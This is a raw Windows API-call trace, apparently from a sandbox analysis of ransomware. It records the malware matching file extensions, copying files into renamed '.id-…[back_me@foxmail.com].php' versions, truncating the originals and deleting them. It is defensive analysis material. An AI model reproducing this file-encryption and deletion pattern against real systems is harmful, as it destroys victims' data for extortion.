[0049.680] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0049.680] lstrlenW (lpString=".xlsx") returned 5 [0049.680] lstrcmpiW (lpString1=".xlsx", lpString2="r.png") returned -1 [0049.680] lstrlenW (lpString=".ppt") returned 4 [0049.680] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0049.681] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png") returned 53 [0049.681] lstrlenW (lpString=".zip") returned 4 [0049.681] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0049.681] lstrlenW (lpString=".rar") returned 4 [0049.681] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0049.681] lstrlenW (lpString=".bz2") returned 4 [0049.681] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0049.681] lstrlenW (lpString=".7z") returned 3 [0049.681] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0049.681] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png") returned 53 [0049.681] lstrlenW (lpString=".dbf") returned 4 [0049.681] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0049.681] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png") returned 53 [0049.681] lstrlenW (lpString=".1cd") returned 4 [0049.681] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0049.681] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png") returned 53 [0049.681] lstrlenW (lpString=".jpg") returned 4 [0049.681] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0052.971] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.973] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.973] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\msjet.xsl.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0052.996] GetLastError () returned 0x0 [0052.996] ReadFile (in: hFile=0x218, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x712e, lpOverlapped=0x0) returned 1 [0053.001] WriteFile (in: hFile=0x1b0, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0x7130, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0x7130, lpOverlapped=0x0) returned 1 [0053.002] ReadFile (in: hFile=0x218, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.002] WriteFile (in: hFile=0x1b0, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0053.002] SetEndOfFile (hFile=0x1b0) returned 1 [0053.002] CloseHandle (hObject=0x1b0) returned 1 [0053.002] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.002] SetEndOfFile (hFile=0x218) returned 1 [0053.014] CloseHandle (hObject=0x218) returned 1 [0053.015] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0053.015] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\msjet.xsl")) returned 1 [0053.016] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl") returned 77 [0053.016] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl") returned 77 [0053.016] lstrlenW (lpString=".doc") returned 4 [0053.016] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1 [0053.016] lstrlenW (lpString=".docx") returned 5 [0053.016] lstrcmpiW (lpString1=".docx", lpString2="t.xsl") returned -1 [0053.016] lstrlenW (lpString=".pdf") returned 4 [0053.016] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1 [0053.016] lstrlenW (lpString=".xls") returned 4 [0053.016] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1 [0053.016] lstrlenW (lpString=".xlsx") returned 5 [0053.016] lstrcmpiW (lpString1=".xlsx", lpString2="t.xsl") returned -1 [0053.016] lstrlenW (lpString=".ppt") returned 4 [0053.016] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1 [0053.016] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl") returned 77 [0053.016] lstrlenW (lpString=".zip") returned 4 [0053.016] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1 [0053.016] lstrlenW (lpString=".rar") returned 4 [0053.016] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1 [0053.017] lstrlenW (lpString=".bz2") returned 4 [0053.017] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1 [0053.017] lstrlenW (lpString=".7z") returned 3 [0053.017] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1 [0053.017] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl") returned 77 [0053.017] lstrlenW (lpString=".dbf") returned 4 [0053.017] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1 [0053.017] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl") returned 77 [0053.017] lstrlenW (lpString=".1cd") returned 4 [0053.017] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1 [0053.017] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl") returned 77 [0053.017] lstrlenW (lpString=".jpg") returned 4 [0053.017] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1 [0053.017] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl") returned 77 [0053.017] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl") returned 77 [0053.017] lstrlenW (lpString=".doc") returned 4 [0053.017] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1 [0053.017] lstrlenW (lpString=".docx") returned 5 [0053.017] lstrcmpiW (lpString1=".docx", lpString2="t.xsl") returned -1 [0053.017] lstrlenW (lpString=".pdf") returned 4 [0053.017] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1 [0053.017] lstrlenW (lpString=".xls") returned 4 [0053.017] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1 [0053.017] lstrlenW (lpString=".xlsx") returned 5 [0053.017] lstrcmpiW (lpString1=".xlsx", lpString2="t.xsl") returned -1 [0053.017] lstrlenW (lpString=".ppt") returned 4 [0053.017] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1 [0053.018] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl") returned 77 [0053.018] lstrlenW (lpString=".zip") returned 4 [0053.018] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1 [0053.018] lstrlenW (lpString=".rar") returned 4 [0053.018] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1 [0053.018] lstrlenW (lpString=".bz2") returned 4 [0053.018] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1 [0053.018] lstrlenW (lpString=".7z") returned 3 [0053.018] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1 [0053.018] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl") returned 77 [0053.018] lstrlenW (lpString=".dbf") returned 4 [0053.018] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1 [0053.018] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl") returned 77 [0053.018] lstrlenW (lpString=".1cd") returned 4 [0053.018] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1 [0053.018] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl") returned 77 [0053.018] lstrlenW (lpString=".jpg") returned 4 [0053.018] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1 [0053.018] lstrcmpiW (lpString1=".GIF", lpString2=".php") returned -1 [0053.018] lstrlenW (lpString="AG00038_.GIF") returned 12 [0053.018] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00038_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0053.020] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=3251) returned 1 [0053.020] CloseHandle (hObject=0x218) returned 1 [0053.020] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00038_.gif")) returned 0x20 [0053.020] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00038_.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0053.020] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00038_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0053.020] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.020] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.020] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00038_.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0053.021] GetLastError () returned 0x0 [0053.021] ReadFile (in: hFile=0x218, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0xcb3, lpOverlapped=0x0) returned 1 [0053.023] WriteFile (in: hFile=0x1b0, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xcc0, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xcc0, lpOverlapped=0x0) returned 1 [0053.024] ReadFile (in: hFile=0x218, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.024] WriteFile (in: hFile=0x1b0, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.024] SetEndOfFile (hFile=0x1b0) returned 1 [0053.024] CloseHandle (hObject=0x1b0) returned 1 [0053.025] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.025] SetEndOfFile (hFile=0x218) returned 1 [0053.025] CloseHandle (hObject=0x218) returned 1 [0053.026] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0053.026] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00038_.gif")) returned 1 [0053.026] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 63 [0053.026] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 63 [0053.026] lstrlenW (lpString=".doc") returned 4 [0053.026] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.026] lstrlenW (lpString=".docx") returned 5 [0053.026] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.027] lstrlenW (lpString=".pdf") returned 4 [0053.027] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.027] lstrlenW (lpString=".xls") returned 4 [0053.027] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.027] lstrlenW (lpString=".xlsx") returned 5 [0053.027] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.027] lstrlenW (lpString=".ppt") returned 4 [0053.027] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.027] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 63 [0053.027] lstrlenW (lpString=".zip") returned 4 [0053.027] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.027] lstrlenW (lpString=".rar") returned 4 [0053.027] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.027] lstrlenW (lpString=".bz2") returned 4 [0053.027] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.027] lstrlenW (lpString=".7z") returned 3 [0053.027] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.027] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 63 [0053.027] lstrlenW (lpString=".dbf") returned 4 [0053.027] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.027] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 63 [0053.027] lstrlenW (lpString=".1cd") returned 4 [0053.027] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.027] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 63 [0053.027] lstrlenW (lpString=".jpg") returned 4 [0053.027] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.027] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 63 [0053.027] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 63 [0053.027] lstrlenW (lpString=".doc") returned 4 [0053.028] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.028] lstrlenW (lpString=".docx") returned 5 [0053.028] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.028] lstrlenW (lpString=".pdf") returned 4 [0053.028] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.028] lstrlenW (lpString=".xls") returned 4 [0053.028] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.028] lstrlenW (lpString=".xlsx") returned 5 [0053.028] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.028] lstrlenW (lpString=".ppt") returned 4 [0053.028] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.028] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 63 [0053.028] lstrlenW (lpString=".zip") returned 4 [0053.028] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.028] lstrlenW (lpString=".rar") returned 4 [0053.028] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.028] lstrlenW (lpString=".bz2") returned 4 [0053.028] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.028] lstrlenW (lpString=".7z") returned 3 [0053.028] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.028] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 63 [0053.028] lstrlenW (lpString=".dbf") returned 4 [0053.028] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.028] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 63 [0053.028] lstrlenW (lpString=".1cd") returned 4 [0053.028] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.028] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 63 [0053.028] lstrlenW (lpString=".jpg") returned 4 [0053.028] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.028] lstrcmpiW (lpString1=".GIF", lpString2=".php") returned -1 [0053.029] lstrlenW (lpString="AG00040_.GIF") returned 12 [0053.029] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00040_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0053.029] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=8097) returned 1 [0053.029] CloseHandle (hObject=0x218) returned 1 [0053.029] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00040_.gif")) returned 0x20 [0053.029] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00040_.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0053.029] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00040_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0053.029] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.029] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.029] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00040_.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0053.030] GetLastError () returned 0x0 [0053.030] ReadFile (in: hFile=0x218, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x1fa1, lpOverlapped=0x0) returned 1 [0053.227] WriteFile (in: hFile=0x1b0, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0x1fb0, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0x1fb0, lpOverlapped=0x0) returned 1 [0053.228] ReadFile (in: hFile=0x218, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.228] WriteFile (in: hFile=0x1b0, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.228] SetEndOfFile (hFile=0x1b0) returned 1 [0053.229] CloseHandle (hObject=0x1b0) returned 1 [0053.229] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.229] SetEndOfFile (hFile=0x218) returned 1 [0053.230] CloseHandle (hObject=0x218) returned 1 [0053.230] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0053.230] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00040_.gif")) returned 1 [0053.230] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 63 [0053.231] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 63 [0053.231] lstrlenW (lpString=".doc") returned 4 [0053.231] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.231] lstrlenW (lpString=".docx") returned 5 [0053.231] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.231] lstrlenW (lpString=".pdf") returned 4 [0053.231] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.231] lstrlenW (lpString=".xls") returned 4 [0053.231] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.231] lstrlenW (lpString=".xlsx") returned 5 [0053.231] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.231] lstrlenW (lpString=".ppt") returned 4 [0053.231] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.231] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 63 [0053.231] lstrlenW (lpString=".zip") returned 4 [0053.231] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.231] lstrlenW (lpString=".rar") returned 4 [0053.231] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.231] lstrlenW (lpString=".bz2") returned 4 [0053.231] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.231] lstrlenW (lpString=".7z") returned 3 [0053.231] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.231] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 63 [0053.231] lstrlenW (lpString=".dbf") returned 4 [0053.231] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.231] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 63 [0053.231] lstrlenW (lpString=".1cd") returned 4 [0053.231] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.231] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 63 [0053.231] lstrlenW (lpString=".jpg") returned 4 [0053.231] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.307] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=3140) returned 1 [0053.307] CloseHandle (hObject=0x21c) returned 1 [0053.308] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00126_.gif")) returned 0x20 [0053.308] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00126_.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0053.308] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00126_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0053.308] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.308] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.308] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00126_.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0053.308] GetLastError () returned 0x0 [0053.308] ReadFile (in: hFile=0x21c, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0xc44, lpOverlapped=0x0) returned 1 [0053.310] WriteFile (in: hFile=0x218, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xc50, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xc50, lpOverlapped=0x0) returned 1 [0053.311] ReadFile (in: hFile=0x21c, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.311] WriteFile (in: hFile=0x218, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.311] SetEndOfFile (hFile=0x218) returned 1 [0053.312] CloseHandle (hObject=0x218) returned 1 [0053.312] SetFilePointerEx (in: hFile=0x21c, 